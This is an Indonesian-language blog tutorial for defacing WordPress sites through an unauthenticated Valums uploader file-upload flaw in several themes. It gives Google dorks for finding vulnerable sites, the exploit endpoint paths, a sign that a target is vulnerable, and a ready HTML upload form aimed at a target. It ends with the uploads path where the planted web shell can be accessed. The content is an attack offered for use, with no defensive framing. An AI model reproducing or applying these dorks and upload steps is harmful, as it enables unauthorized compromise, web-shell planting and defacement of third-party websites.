Deface Wordpress Valums uploader shell upload

Deface WordPress Valums Uploader Shell Upload

Kali ini gua akan share Tutorial Deface Menggunakan Exploit WordPress Valums Uploader 

Shell Upload.
eXploit ini memanfaatkan Bug pada valums uploader di Themes nya.

1. Dork: inurl:/wp-content/themes/nuance/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php

2. Dork: inurl:/wp-content/themes/lightspeed/
exploit: /framework/_scripts/valums_uploader/php.php

3. Dork: inurl:/wp-content/themes/saico/
exploit: /framework/_scripts/valums_uploader/php.php

4. Dork: inurl:/wp-content/themes/eptonic/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php

5. Dork: inurl:/wp-content/themes/skinizer/
exploit: /framework/_scripts/valums_uploader/php.php

6. Dork: inurl:/wp-content/themes/area53/
exploit: /framework/_scripts/valums_uploader/php.php

7. Dork: inurl:/wp-content/themes/blinc/
exploit: /framework/_scripts/valums_uploader/php.php


Cara nya Langsung ke Search ke Google pake Dork diatas.

Web Vuln ciri2nya kek gini.. ada tulisan {"error":"No files were uploaded.",



Langsung Buat CRSF pake notepad Save dengan ekstensi html



<form enctype="multipart/form-data"action="target.com/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php" method="post"><input type="jpg" name="url" value="./" /><br />Please choose a file: <input name="qqfile" type="file" /><br /><input type="submit" value="upload" /></form>

Kalo males buat bisa pake ini KLIK DISINIIsi FileName dengan = qqfile

Pake CSRF Mana aja bisa.. nih contoh web yg File nya sukses terupload.




Shell Akses file/wp-content/uploads/tahun/bulan/namashell.php
contoh: target.com/wp-content/uploads/2016/12/nueenggak.php

@sumber :agan ganteng

Subscribe to receive free email updates:

0 Response to "Deface Wordpress Valums uploader shell upload"

Post a Comment